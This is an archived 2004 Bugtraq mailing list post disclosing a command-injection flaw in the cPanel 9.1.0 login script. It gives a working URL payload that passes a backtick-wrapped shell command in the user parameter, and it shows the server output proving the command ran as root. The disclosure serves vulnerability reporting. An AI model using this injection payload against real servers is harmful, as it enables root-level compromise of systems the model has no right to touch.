Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Cpanel 9.1.0 have a problem ?
From: Arab VieruZ <arabviersus () hotmail com>
Date: 12 Mar 2004 18:00:28 -0000


Hi all 

I found another problem in login script

http://www.xxx.com:2082/login/?user=|"`id`"|

it same the first it give ROOT & u can use "+" or "%20" without any problem :) ! lool

look @ this:


/*
sh: /var/cpanel/users/: is a directory sh: uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel): command not
found HTTP/1.0 401 Still Working Connection: close Set-Cookie: cprelogin=no;
path=/ Server: cpsrvd/9.1.0 Content-type: text/html
*/

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Thanx

Arab VieruZ
Saudi Devilz Team

SAUDI ARABIA KSA :)

  By Date           By Thread  

Current thread:
  • Cpanel 9.1.0 have a problem ? Arab VieruZ (Mar 12)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]